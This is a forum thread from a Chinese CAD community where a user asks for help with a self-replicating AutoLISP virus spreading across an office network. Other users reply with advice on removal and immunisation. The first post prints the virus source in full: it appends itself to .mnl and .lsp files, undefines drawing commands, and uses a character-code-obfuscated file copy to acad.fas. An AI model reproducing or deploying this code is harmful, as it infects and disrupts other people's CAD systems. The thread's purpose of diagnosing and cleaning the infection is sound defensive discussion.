明经CAD社区

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
查看: 4920|回复: 13

对病毒有研究的来看一下啊,无穷无尽的杀不死啊

  [复制链接]
发表于 2012-12-3 10:07:26 | 显示全部楼层 |阅读模式
1明经币
目前整个网络内都是这样的病毒,看了一下代码,能看懂,但没发现有什么破坏作用,只是不停地繁衍后代,杀不死,请教高手看一下。整个acaddoc.lsp的内容如下,第一行是空行。现在能看懂代码在做什么,因为acaddoc的优先级比用户的VLX优先,不知道如何查杀及免疫?



(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
   (setq flag nil)
   (setq flag1 t)
   (if (findfile target)
     (progn
       (setq wjm1 (open target "r"))
       (while (setq text (read-line wjm1))
        (if (= text bz) (setq flag1 nil))
        );while
       (close wjm1)
       );progn
     );if
   (if flag1
     (progn
       (setq wjm (open source "r"))
       (setq wjm1 (open target "a"))
       (write-line (chr 13) wjm1)
       (while (setq text (read-line wjm))
        (if (= text bz) (setq flag t))
        (if flag
          (progn
            (write-line text wjm1)
            );progn
          );if
        );while
       (close wjm1)
       (close wjm)
       );progn
     );if
   );defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
   (progn
     (setq acaddocpath (vl-filename-directory dwgpath))
     (setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
     (setq mnln 0)
     (while (< mnln mnlnum)
       (setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
       (app mnlfilename acaddocfile bz)
       (app acaddocfile mnlfilename bz)
       (setq mnln (1+ mnln))
       );while
     (setq lspn 0)
     (while (< lspn lspnum)
       (setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
       (app lspfilename acaddocfile bz)
       (app acaddocfile lspfilename bz)
       (setq lspn (1+ lspn))
       );while
     );progn
   );if
(setq mnln 0)
(while (< mnln mnlnum)
   (setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
   (setq mnln1 0)
   (while (< mnln1 mnlnum)
     (setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
     (app mnlfilename mnlfilename1 bz)
     (setq mnln1 (1+ mnln1))
     );while
   (setq lspn1 0)
   (while (< lspn1 lspnum)
     (setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
     (app mnlfilename lspfilename1 bz)
     (setq lspn1 (1+ lspn1))
     );while
   (setq mnln (1+ mnln))
   );while
(setq lspn 0)
(while (< lspn lspnum)
   (setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
   (setq lspn1 0)
   (while (< lspn1 lspnum)
     (setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
     (app lspfilename lspfilename1 bz)
     (setq lspn1 (1+ lspn1))
     );while
   (setq mnln1 0)
   (while (< mnln1 mnlnum)
     (setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
     (app lspfilename mnlfilename1 bz)
     (setq mnln1 (1+ mnln1))
     );while
   (setq lspn (1+ lspn))
   );while
(setvar "sdi" 1)
(setvar "ACADLSPASDOC" 1)
(command "undefine" "line")
(command "undefine" "_line")
(command "undefine" "xref")
(command "undefine" "_xref")
(command "undefine" "explode")
(command "undefine" "_explode")
(setvar "cmdecho" 1)
(princ)
(load "acadapq")
(princ)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
   (setq flag nil)
   (setq flag1 t)
   (if (findfile target)
     (progn
       (setq wjm1 (open target "r"))
       (while (setq text (read-line wjm1))
        (if (= text bz) (setq flag1 nil))
        );while
       (close wjm1)
       );progn
     );if
   (if flag1
     (progn
       (setq wjm (open source "r"))
       (setq wjm1 (open target "a"))
       (write-line (chr 13) wjm1)
       (while (setq text (read-line wjm))
        (if (= text bz) (setq flag t))
        (if flag
          (progn
            (write-line text wjm1)
            );progn
          );if
        );while
       (close wjm1)
       (close wjm)
       );progn
     );if
   );defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(if(null autodeskwybs)(if(findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-file-copy (findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-list->string '(97 99 97 100 46 102 97 115))))(princ))
(if(null autodeskwybs)(if(findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-file-copy (findfile(vl-list->string '(116 120 116 97 117 116 111 122 46 115 104 120)))(vl-list->string '(97 99 97 100 46 102 97 115))))(princ))


附件: 您需要 登录 才可以下载或查看,没有账号?注册

最佳答案

查看完整内容

用SHLISP的CAD病毒专杀也不可以吗?
"觉得好,就打赏"
还没有人打赏,支持一下
发表于 2012-12-3 10:07:27 | 显示全部楼层
用SHLISP的CAD病毒专杀也不可以吗?

点评

最后还是用的SHLISP的筑原CAD病毒专杀3.3版本  发表于 2012-12-5 15:01
回复

使用道具 举报

发表于 2012-12-3 11:06:04 | 显示全部楼层
这是两段“病毒”,因为是明码,所以还不能算病毒,只能是恶意代码,但因为人人能改所以危害更深。
这两段病毒涉及到的文件有“acad.lsp acaddoc.lsp acadapq.lsp acad.fas acad.mnl txtautoz.shx”等等,其中txtautoz.shx和是隐藏的病毒源,其它都是被程序调用的病毒代码,除acad.mn(实际上是lisp文件)l以外,都可以删除,acad.mnl需要打开自行删除上面代码,如果有自己的acad.lsp,则也要打开检查。
没有仔细研究这些代码,所以不好细说,以前还有过代码涉及文件“acadapp.lsp acadappq.lsp等 acad.vlx logo.gif”等等,这些文件也是同样处理,注意,logo.gif是一个图标常用的图片,不可随意删除,检查时,采用“缩略图”查看方式就一目了然了。
还有,以前也遇到过代码复制到你打开的任意Lisp文件中的情况,这样,就需要检查电脑中的每一个Lisp文件和mnl文件,太多了?是的,那么,搜索时,就要注意时间节点了,同时,搜索时,也不要忘记隐藏的系统文件夹。
另外,这样“杀”过毒后,把大多数的Lisp文件和mnl文件加一个“只读”属性。

点评

不好意思点错了,最佳答案变成二楼了  发表于 2012-12-5 15:04

评分

参与人数 1明经币 +1 收起 理由
革天明 + 1 赞一个!

查看全部评分

回复

使用道具 举报

发表于 2012-12-3 12:34:58 | 显示全部楼层
360的cad专杀就能行,这个我也遇到过

点评

我也用过360,只是觉得360的CAD病毒专杀和360杀毒一样,“夸大病毒,错杀一千”,  发表于 2012-12-5 15:02
回复

使用道具 举报

发表于 2012-12-3 18:32:49 | 显示全部楼层
本帖最后由 kwok 于 2012-12-3 18:33 编辑

整个网络就不好搞了,如果是每台电脑都有就麻烦了,要一台台清了,
把电脑内搜出此文件,一般有acaddoc.lsp可能还会带一个acad.fas的,搜完都删掉,再杀一下毒.
.此文一般跟dwg文件在同一目录下.
最好平时注意复制别人的图时要看看目录下有没有此文件,有就要删掉,不然就中招.
.
回复

使用道具 举报

发表于 2012-12-3 19:31:22 | 显示全部楼层
遇到过被360搞了
回复

使用道具 举报

发表于 2012-12-3 21:21:32 | 显示全部楼层
这个几年前见过。比较难的是这病毒在所有的正常LISP程序后尾部都加了自己的代码。
手工删除就要将所有LISP程序打开,找(setq flagx t),将其后的代码删除。并将ACAD.MNL尾部的引导部分删了,注意病毒比较狡猾,用了一页的空白将代码放在最后。
然后要按ll_j的说明,将扩展名为lsp的文件和acad.mnl文件全都改成只读,以进行免疫。

评分

参与人数 1明经币 +1 收起 理由
革天明 + 1

查看全部评分

回复

使用道具 举报

 楼主| 发表于 2012-12-4 09:50:14 | 显示全部楼层
ZZXXQQ 发表于 2012-12-3 21:21
这个几年前见过。比较难的是这病毒在所有的正常LISP程序后尾部都加了自己的代码。
手工删除就要将所有LISP ...

光是手工删除本地电脑都比较麻烦,360的CAD专杀实际比较笨,把所有的都删除了,最后搞的CAD都不能正确运行,现在整个局域网都有了,所以杀不胜杀,
幸亏现在电脑配置都还不错,因为这段代码只浪费不到1s时间,所以打算任它猖狂了
局域网用户电脑水平参差不齐,所以没有进攻能力的时候还是不理它了

点评

此病毒在所有LISP文件后面附加病毒代码,文件会越来越大,机器速度也会越来越慢……  发表于 2012-12-4 11:43
回复

使用道具 举报

 楼主| 发表于 2012-12-4 12:58:49 | 显示全部楼层
今天使用筑原CAD病毒杀了,能杀掉,目前最新版本3.3

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x

评分

参与人数 1明经币 +1 收起 理由
自贡黄明儒 + 1 很给力!

查看全部评分

回复

使用道具 举报

发表于 2012-12-7 19:55:56 | 显示全部楼层
革天明 发表于 2012-12-4 12:58
今天使用筑原CAD病毒杀了,能杀掉,目前最新版本3.3

谢谢您好提供“筑原CAD病毒专杀”。想当初不知花了我多少精力的。这样就有备无患了。

点评

互相帮助,共同进步  发表于 2012-12-7 23:21
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|CAD论坛|CAD教程|CAD下载|联系我们|关于明经|明经通道 ( 粤ICP备05003914号 )  
©2000-2023 明经通道 版权所有 本站代码,在未取得本站及作者授权的情况下,不得用于商业用途

GMT+8, 2024-12-24 01:14 , Processed in 0.199089 second(s), 31 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表